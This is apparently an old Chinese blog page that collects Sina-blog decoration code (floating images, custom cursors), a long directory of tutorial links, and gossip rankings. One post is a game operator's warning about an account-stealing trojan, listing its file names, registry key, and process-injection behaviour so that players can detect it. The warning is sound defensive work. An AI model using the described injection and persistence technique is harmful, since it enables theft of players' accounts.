动态左右对联代码:(左边) <DIV id=moaz style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; ; RIGHT: expression(eval(document.body.scrollLeft)+eval(document.body.clientWidth)-100); FILTER: progid:DXImageTransform.Microsoftpadding:8px; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none; POSITION: absolute; ; TOP: expression(eval(document.body.scrollTop)+eval(document.body.clientHeight)-470); TEXT-ALIGN: center"><IMG src="图片地址" border=0 alt=左对联></DIV>

动态左右对联代码:(右边) <DIV id=moaz style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; ; RIGHT: expression(eval(document.body.scrollLeft)+eval(document.body.clientWidth)-970); FILTER: progid:DXImageTransform.Microsoftpadding:8px; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none; POSITION: absolute; ; TOP: expression(eval(document.body.scrollTop)+eval(document.body.clientHeight)-470); TEXT-ALIGN: center"><IMG src="图片地址" border=0 alt=右对联></DIV>
LEFT:10PX    图片距离左面屏幕边缘的距离。一般数字选择0~10之间的数值,具体根据图片的宽度以及自己想要放置的位置而定。
TOP:50PX    图片距离上面屏幕边缘的距离。具体根据自己想要放置的位置而定。右侧同理

鼠标的添加方法:
代码如下:
<DIV><STYLE type=text/css> BODY{cursor:url('鼠标文件网址a');} A {CURSOR: url('鼠标文件网址b');} </STYLE> </DIV>
代码说明:
    以上代码中,Body后面的'鼠标文件网址a'是显示在文章主体中的鼠标样式,也就是大部分位置会显示你在此处替换的鼠标网址.
   '鼠标文件网址b'则是会在你的鼠标移动到某个栏目有链接的地方才会显示的鼠标样式,普通情况不会显示.可以和网址A添加的一样,也可以换成别的样式的!
    鼠标代码仅适用于后缀为.ani和.cur的格式.
 
2007-08-08 16:26
猜猜这三人是谁
 
2007-08-08 15:01

   如何填加新浪博客模板代码?(图)

添加博客模板之前,强烈建议下载博客浏览辅助软件再添加代码,本博客所有博客模板效果均在此博客浏览辅助软件完成!如不下载安装,可能导致代码添加不全,未能达到期待效果!

下载地址: 火狐2.0 博客浏览辅助软件

第一步:进入管理博客,点击个人首页维护中的维护首页内容!(如图)

第二步:进入维护首页内容后,找到自定义空白面板,点击 进入编辑!(如图)

第三步:进入编辑后,点击新增!(如图)

第四步:写好面板标题,也就是你要填加的模板标题!(如图)

第五步:最关键的一步,写好面板标题,点击面板里一下,再打下空格或回车!
       再点击
第六步:点击
第七步:接着<DIV> </DIV> 后填加你要的博客模板代码!然后保存!
第八步:返回管理博客后,点击右栏中的自定义设置中的定制我的首页!
第九步:等完全进入定制我的首页的页面中点击添加模块!
第十步:在弹出的页面中找到你刚才命名的模块,点击选择
第十一步:最后点击保存设置就OK了!
 
2007-08-08 14:57

〓〓〓〓〓〓〓〓〓〓综合类〓〓〓〓〓〓〓〓〓〓博客代码大全首页http://blog.sina.com.cn/hack999#sort_1

新浪博客模板代码http://blog.sina.com.cn/u/4a38c37a0100085c

新浪博客模板代码大全http://blog.sina.com.cn/u/4a38c37a0100082n

博客播放器代码大全http://blog.sina.com.cn/u/4a38c37a01000808

博客特效代码大全http://blog.sina.com.cn/u/4a38c37a01000809

博客鼠标代码大全http://blog.sina.com.cn/u/4a38c37a0100080v

博客时钟代码大全http://blog.sina.com.cn/u/4a38c37a0100080w

怎么样添加代码的介绍(附图)http://blog.sina.com.cn/u/4a38c37a010007h4

〓〓〓〓〓〓〓〓〓〓博客模板.通栏,背景〓〓〓〓〓〓〓〓〓〓

新浪博客模板代码http://blog.sina.com.cn/u/4a38c37a0100085c

新浪博客模板代码大全http://blog.sina.com.cn/u/4a38c37a0100082n

如何在博客中添加FLASH透明背景 http://blog.sina.com.cn/u/4a38c37a01000796

改变模板效果的代码汇总http://blog.sina.com.cn/u/4a38c37a010007km

新浪博客菜单处导航栏代码http://blog.sina.com.cn/u/4a38c37a0100075p

隐藏首页精华圈子美图的代码 http://blog.sina.com.cn/u/4a38c37a01000784

最新最简去掉新浪博客标题代码 http://blog.sina.com.cn/u/4a38c37a0100076g

面板加宽BLOG标题大小以及字体http://blog.sina.com.cn/u/4a38c37a010007h0

首页模板全部透明的代码http://blog.sina.com.cn/u/4a38c37a010007i5

BOLG通栏处的鸟与花的代码http://blog.sina.com.cn/u/4a38c37a010007i6

最新推出两款blog模版风格http://blog.sina.com.cn/u/4a38c37a010007i7

六款blog模版风格http://blog.sina.com.cn/u/4a38c37a010007i8

横幅图片及添加代码http://blog.sina.com.cn/u/4a38c37a010007i9

新款BOLG模板-横幅+背景http://blog.sina.com.cn/u/4a38c37a010007ia

几张BLOG横幅的图片http://blog.sina.com.cn/u/4a38c37a010007ib

几百个flash地址http://blog.sina.com.cn/u/4a38c37a010007ic

12款特色主题模板套装http://blog.sina.com.cn/u/4a38c37a010007j3

几百个flash地址http://blog.sina.com.cn/u/4a38c37a010007ic

〓〓〓〓〓〓〓〓〓〓常用音视频代码〓〓〓〓〓〓〓〓〓〓

如何在博客文章中加入视频http://blog.sina.com.cn/u/4a38c37a010007h1

新浪博客音乐播放器添加 http://blog.sina.com.cn/u/4a38c37a0100075v

插入FLASH动画的代码http://blog.sina.com.cn/u/4a38c37a010007hd

几种视频播放器的代码http://blog.sina.com.cn/u/4a38c37a010007he

自动调网上插件的播放器代码http://blog.sina.com.cn/u/4a38c37a010007hf

多首MP3歌曲的播放器(17款)http://blog.sina.com.cn/u/4a38c37a010007hg

几种简单的音频播放器代码 http://blog.sina.com.cn/u/4a38c37a010007hh

在线汉字格式播放器代码http://blog.sina.com.cn/u/4a38c37a010007hi

几种简单的音频播放器代码http://blog.sina.com.cn/u/4a38c37a010007hk

几款播放器与播放器的美化http://blog.sina.com.cn/u/4a38c37a010007hl

〓〓〓〓〓〓〓〓〓〓链接,公告,文字,图片〓〓〓〓〓〓〓〓〓〓

无限制上传图片的方法http://blog.sina.com.cn/u/4a38c37a010007gy

隐藏博客各部分的代码大全http://blog.sina.com.cn/u/4a38c37a010007gt

博客文章的图片太大怎么调整http://blog.sina.com.cn/u/4a38c37a01000795

图片滚动的效果http://blog.sina.com.cn/u/4a38c37a010007hm

左右飘动的图片代码http://blog.sina.com.cn/u/4a38c37a010007hn

上下滚动图片的代码http://blog.sina.com.cn/u/4a38c37a010007ho

滚动公告的代码http://blog.sina.com.cn/u/4a38c37a010007hp

给新浪博客添加滚动公告栏    http://blog.sina.com.cn/u/4a38c37a01000781

滚动字幕和滚动图片代码 ttp://blog.sina.com.cn/u/4a38c37a0100076s

一款漂亮的链接栏代码http://blog.sina.com.cn/u/4a38c37a010007hq

几种实用的滚动文字的代码http://blog.sina.com.cn/u/4a38c37a010007hr

网页左右两边滚动图片代码http://blog.sina.com.cn/u/4a38c37a010007hs

把滚动图片放在横幅上面的代码http://blog.sina.com.cn/u/4a38c37a010007ht

我使用的滚动公告的代码http://blog.sina.com.cn/u/4a38c37a010007hu

顶部滚动的字幕http://blog.sina.com.cn/u/4a38c37a010007hv

阅读式公告栏代码http://blog.sina.com.cn/u/4a38c37a010007hw

最新幻灯片代码http://blog.sina.com.cn/u/4a38c37a010007hx

两款幻灯片的代码http://blog.sina.com.cn/u/4a38c37a010007hy

滚动新闻代码    http://blog.sina.com.cn/u/4a38c37a0100076a

去掉新浪博客最底下文字的代码 http://blog.sina.com.cn/u/4a38c37a0100075o

下拉列表链接代码   http://blog.sina.com.cn/u/4a38c37a01000769

加入滚动条代码 http://blog.sina.com.cn/u/4a38c37a01000765

细线表格制做代码 http://blog.sina.com.cn/u/4a38c37a01000764

图片链接移动代码   http://blog.sina.com.cn/u/4a38c37a01000763

可以让别人在博客里留言的代码   http://blog.sina.com.cn/u/4a38c37a0100076u

文字移动代码   http://blog.sina.com.cn/u/4a38c37a01000762

开始打扮博客(3.边框效果) http://blog.sina.com.cn/u/4a38c37a0100075s

开始打扮博客(2.图片效果) http://blog.sina.com.cn/u/4a38c37a0100075r

开始打扮博客(文字效果) http://blog.sina.com.cn/u/4a38c37a0100075q

文章背景图图片左边右边插入文字http://blog.sina.com.cn/u/4a38c37a0100075w

代码素材4----背景图片 http://blog.sina.com.cn/u/4a38c37a0100076m

代码素材3-漂浮图片 http://blog.sina.com.cn/u/4a38c37a0100076l

代码素材2--跳动图片及盆景 http://blog.sina.com.cn/u/4a38c37a0100076k

代码素材1----分割线 http://blog.sina.com.cn/u/4a38c37a0100076j

美化必备-常用颜色代码part2 http://blog.sina.com.cn/u/4a38c37a0100076p

美化必备-常用颜色代码part1   http://blog.sina.com.cn/u/4a38c37a0100076o

〓〓〓〓〓〓〓〓〓〓透明FLASH特效及挂件〓〓〓〓〓〓〓〓〓〓

精美FLASH特效相册之吐血推荐http://blog.sina.com.cn/u/4a38c37a0100078g

申请你的FLASH生日倒记时http://blog.sina.com.cn/u/4a38c37a010007kl

打开新浪博客网页时右上角撕下一块儿来的撕页翻角效果代码http://blog.sina.com.cn/u/4a38c37a0100078c

如何在博客中添加FLASH透明背景 http://blog.sina.com.cn/u/4a38c37a01000796

新浪博客首页两侧加入浮动挂件效果代码 http://blog.sina.com.cn/u/4a38c37a0100076q

新浪博客最新开场动画效果代码 http://blog.sina.com.cn/u/4a38c37a01000780

博客中加入FLASH投票系统    http://blog.sina.com.cn/u/4a38c37a0100078j

在线照相大头贴代码http://blog.sina.com.cn/u/4a38c37a0100077u

制作FLASH+图片动画效果的代码 http://blog.sina.com.cn/u/4a38c37a0100078i

博客文章加入FLASH特效的代码   http://blog.sina.com.cn/u/4a38c37a0100078h

博客网页flash图片幻灯片导航效果代码   http://blog.sina.com.cn/u/4a38c37a0100078e

flash特效以及地址一http://blog.sina.com.cn/u/4a38c37a010007h5

flash特效以及地址二http://blog.sina.com.cn/u/4a38c37a010007h6

flash特效以及地址三http://blog.sina.com.cn/u/4a38c37a010007h7

flash特效以及地址四http://blog.sina.com.cn/u/4a38c37a010007h8

flash特效以及地址五http://blog.sina.com.cn/u/4a38c37a010007h9

flash特效以及地址六http://blog.sina.com.cn/u/4a38c37a010007hz

flash特效以及地址七http://blog.sina.com.cn/u/4a38c37a010007i0

flash特效以及地址八http://blog.sina.com.cn/u/4a38c37a010007i1

flash特效以及地址九http://blog.sina.com.cn/u/4a38c37a010007i2

flash特效以及地址十http://blog.sina.com.cn/u/4a38c37a010007i3

一道美丽阳光的代码http://blog.sina.com.cn/u/4a38c37a010007i4

关于两侧掛件(对联)添加方法http://blog.sina.com.cn/u/4a38c37a010007ha

如何加入透明Flash背景 http://blog.sina.com.cn/u/4a38c37a0100075y

〓〓〓〓〓〓〓〓〓〓鼠标〓〓〓〓〓〓〓〓〓〓

如何添加鼠标(视频教程)http://blog.sina.com.cn/u/4a38c37a010007kc

关于鼠标指针添加的方法http://blog.sina.com.cn/u/4a38c37a010007hb

荧光棒等鼠标指针http://blog.sina.com.cn/u/4a38c37a010007kj

鼠标后面跟一串字的代码 http://blog.sina.com.cn/u/4a38c37a0100076n

鼠标指针大全一http://blog.sina.com.cn/u/4a38c37a010007j5

鼠标指针大全二http://blog.sina.com.cn/u/4a38c37a010007j6

鼠标指针大全三http://blog.sina.com.cn/u/4a38c37a010007j7

鼠标指针大全四http://blog.sina.com.cn/u/4a38c37a010007j8

〓〓〓〓〓〓〓〓〓〓时钟〓〓〓〓〓〓〓〓〓〓

加入时钟代码   http://blog.sina.com.cn/u/4a38c37a0100075x

博客停留时间代码 http://blog.sina.com.cn/u/4a38c37a0100076f

142个FLASH时钟http://blog.sina.com.cn/u/4a38c37a010007j9

超可爱的小猪FLASH时钟http://blog.sina.com.cn/u/4a38c37a010007ke

六款精致的FLASH风景时钟http://blog.sina.com.cn/u/4a38c37a010007ja

很酷的数字时钟http://blog.sina.com.cn/u/4a38c37a010007jb

一款棒球时钟代码http://blog.sina.com.cn/u/4a38c37a010007jc

FLASH时钟一http://blog.sina.com.cn/u/4a38c37a010007jd

不同风格的FLASH时钟一http://blog.sina.com.cn/u/4a38c37a010007je

几款国外的特色时钟http://blog.sina.com.cn/u/4a38c37a010007jf

数字时钟上http://blog.sina.com.cn/u/4a38c37a010007jg

FLASH时钟http://blog.sina.com.cn/u/4a38c37a010007jh

我一般使用的FLASH时钟代码http://blog.sina.com.cn/u/4a38c37a010007ji

一款个性很酷的时钟 http://blog.sina.com.cn/u/4a38c37a0100076t

博客中加入奥运会倒计时代码 http://blog.sina.com.cn/u/4a38c37a0100076r

为新浪博客添加“历史上的今天”代码   http://blog.sina.com.cn/u/4a38c37a0100077z

〓〓〓〓〓〓〓〓〓〓链接显示效果〓〓〓〓〓〓〓〓〓〓

给链接添加背景色http://blog.sina.com.cn/u/4a38c37a010007jj

链接变色的代码http://blog.sina.com.cn/u/4a38c37a010007jk

触到链接是出现虚线的代码http://blog.sina.com.cn/u/4a38c37a010007jl

增加链接的力度的代码http://blog.sina.com.cn/u/4a38c37a010007jm

链接字体下沉的代码http://blog.sina.com.cn/u/4a38c37a010007jn

〓〓〓〓〓〓〓〓〓〓其它综合效果〓〓〓〓〓〓〓〓〓〓

新浪blog代码教程(二)   http://blog.sina.com.cn/u/4a38c37a0100078v

博客挂件代码教程 http://blog.sina.com.cn/u/4a38c37a0100078u

新浪blog代码教程    http://blog.sina.com.cn/u/4a38c37a0100078t

新浪博客背景代码 http://blog.sina.com.cn/u/4a38c37a0100078s

博客代码语言汇总(三)http://blog.sina.com.cn/u/4a38c37a0100078r

博客代码语言汇总(二)   http://blog.sina.com.cn/u/4a38c37a0100078q

博客代码语言汇总   http://blog.sina.com.cn/u/4a38c37a0100078p

博客代码检测器   http://blog.sina.com.cn/u/4a38c37a0100078f

代码在线运行检测程序http://blog.sina.com.cn/u/4a38c37a010007kd

保护你博客内容知识产权的代码http://blog.sina.com.cn/u/4a38c37a010007kg

申请我要啦免费统计http://blog.sina.com.cn/u/4a38c37a010007kh

博客自动跳转到另外一个页面http://blog.sina.com.cn/u/4a38c37a010007ki

免费空间网址 http://blog.sina.com.cn/u/4a38c37a010007kk

精美FLASH特效相册http://blog.sina.com.cn/u/4a38c37a0100078g

关闭博客页面时的问候代码http://blog.sina.com.cn/u/4a38c37a010007jo

从底部弹出的小窗口代码http://blog.sina.com.cn/u/4a38c37a010007jp

两种欢迎光临的声音http://blog.sina.com.cn/u/4a38c37a010007jq

最简单的墨林老人代码http://blog.sina.com.cn/u/4a38c37a010007jr

QQ及时通话http://blog.sina.com.cn/u/4a38c37a010007js

添加QQ即时通话的代码http://blog.sina.com.cn/u/4a38c37a0100076h

晒网在线聊天室交谈代码http://blog.sina.com.cn/u/4a38c37a0100078d

返回顶部代码http://blog.sina.com.cn/u/4a38c37a010007jt

添加搜索引擎代码 http://blog.sina.com.cn/u/4a38c37a01000761

如何让百度和GOOGLE搜索到你的博客   http://blog.sina.com.cn/u/4a38c37a0100076i

博客代码搜索 http://blog.sina.com.cn/u/4a38c37a0100078a

如何让搜索引擎搜索到你的博客(blog) http://blog.sina.com.cn/u/4a38c37a01000788

生活中实用查询代码   http://blog.sina.com.cn/u/4a38c37a0100076e

免费IP地址位置查询代码 http://blog.sina.com.cn/u/4a38c37a01000768

免费手机地理位置查询代码 http://blog.sina.com.cn/u/4a38c37a01000767

显IP地址免费代码 http://blog.sina.com.cn/u/4a38c37a01000766

搜索引擎免费登陆入口大全   http://blog.sina.com.cn/u/4a38c37a01000787

个性独特的Google搜索代码   http://blog.sina.com.cn/u/4a38c37a0100077c

百度logo合集代码 http://blog.sina.com.cn/u/4a38c37a0100076c

百度搜索中文最强免费搜索代码    http://blog.sina.com.cn/u/4a38c37a0100077v

添加邮箱快速登录代码 http://blog.sina.com.cn/u/4a38c37a01000760



 
2007-08-07 17:59

近日工作人员再次截获一种新的梦幻西游盗号木马,特此提醒广大玩家注意帐号安全,并公布它的一些特征,希望广大玩家仔细分辨、避免被盗,加强帐号安全意识,维护自身权益。

一、该木马具备以下特征:

       1、木马在%systemDir%\System32\目录和%systemDir%\System32\Drivers\中创建以下文件:

              xyepri.dll   RemoteDbg.dll  CelInDriver.sys    CelInDriver.sysk

       2、木马修改注册表以下位置

HKCR\CLSID\{613AF41A-21B1-131B-1BFC-D2A90DF4A2B6}\InprocServer32\(Default) SUCCESS "C:\WINDOWS\system32\xyepri.dll"

3、将xyepri.dll注入到explorer.exe中。启动梦幻后,再注入进my.exe游戏进程窃取游戏帐号密码。

4、将RemoteDbg.dll作为系统服务,利用服务启动木马。

二、建议玩家做如下检测:

       1、搜索计算机内是否有以下异常文件:

              xyepri.dll    RemoteDbg.dll  CelInDriver.sys    CelInDriver.sysk

       2、建议使用安全卫士等可以查看加载具体DLL的软件。查看explorer.exemy.exe 进程中是否被注入了xyepri.dll   RemoteDbg.dll

      

       3、请在运行栏中输入“regedit”打开注册表,查看木马特征第二项中所提示的注册表位置是否有异常。

       4、请打开“控制面板”--à“管理工具”--à“服务” 检查服务中,是否存在 RemoteDbg.dll

我们已经在分析此类木马,并会尽快处理。如果大家检测到以上状况请保存重要资料后进行离线全盘杀毒重装系统。

如果您发现有以上特征,并且已经登录过游戏,请您尽快到一个安全的网络环境中修改密码,建议您使用“密保卡”绑定您的帐号,这项服务是完全免费的。或者您还可以选择绑定“手机密保”或“将军令”,以确保您的帐号安全。

 
2007-08-07 16:59
全球丑男丑女排行榜
楼主
按此在新窗口浏览图片丑女第四名: 特点:过于肥胖的脸庞+五官分散

按此在新窗口浏览图片丑男第四名:特点:大力水手长发版

按此在新窗口浏览图片丑女第三名:特点:大鼻头+厚嘴唇

按此在新窗口浏览图片 丑男第三名:特点:萎缩了......

按此在新窗口浏览图片丑女第二名:特点:鼻子的弯沟


--------------------------------------

婞諨昰丗屆丄樶.﹎短暫啲東硒,吥喓失去逅才懂嘚紾晞

下一个 “日本女优排行榜”

       全球丑男丑女排行榜

       韩国20大美女排行榜

       如何察觉男人已射精

                          更多信息请点击

 
2007-08-07 16:56
韩国20大美女排行榜

  韩国第一美女金喜善
  [假如爱有天意]孙艺珍
  [大长今]李英爱
  野蛮女友全智贤
  S.E.S组合之 金柳真 (Eugene)



  [对不起,我爱你]林秀晶
  [淘气少女]张娜拉
  [皇太子的初恋]成宥利
  [色即是空]女主角河智苑
  [天桥风云]金南珠



  [人鱼小姐]张瑞希
  [爱上女主播]蔡琳
  [蓝色生死恋]宋慧乔
  [七剑]中之绿珠 金素妍
  [爱在哈佛]金泰熙



  [豪杰春香]韩彩英
  [黄手帕]韩佳人
  [我的小小新娘]文根英

下一个 “日本女优排行榜”

       全球丑男丑女排行榜

       韩国20大美女排行榜

       如何察觉男人已射精

                          更多信息请点击

 
   
 
 
文章分类
 
   
 
文章存档
 
     
 
最新文章评论
  

谢谢啊,我用了的哟!
 

不错 谢了
 

bv nbfn drhet nm
 

谢谢 了挖
 

1060202956 这个是我的QQ号 师傅
   
帮助中心 | 空间客服 | 投诉中心 | 空间协议
©2012 Baidu